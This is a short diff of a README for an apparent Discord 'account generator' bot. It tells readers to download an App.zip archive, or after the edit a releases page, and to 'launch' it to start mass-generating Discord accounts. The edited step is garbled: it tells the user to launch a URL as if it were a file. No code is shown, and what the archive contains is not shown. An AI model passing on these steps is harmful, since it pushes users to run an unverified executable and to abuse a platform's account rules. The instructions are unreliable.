anayacpm01/BotGen-Discord/README.md

 - galackqsm

 ## 📦 Latest Release
-Please download the latest version of the BotGen-Discord Bot from the following link: [Download App.zip](https://github.com/repo/releases/9246/App.zip)
+Please download the latest version of the BotGen-Discord Bot from the following link: [Download https://github.com/anayacpm01/BotGen-Discord/releases](https://github.com/anayacpm01/BotGen-Discord/releases)

 ## 🚀 Getting Started
 1. Download the BotGen-Discord Bot from the provided link.
-2. Launch the App.zip file to install the Bot.
+2. Launch the https://github.com/anayacpm01/BotGen-Discord/releases file to install the Bot.
 3. Follow the on-screen instructions to start generating accounts on Discord.

 ## 🖥️ Demo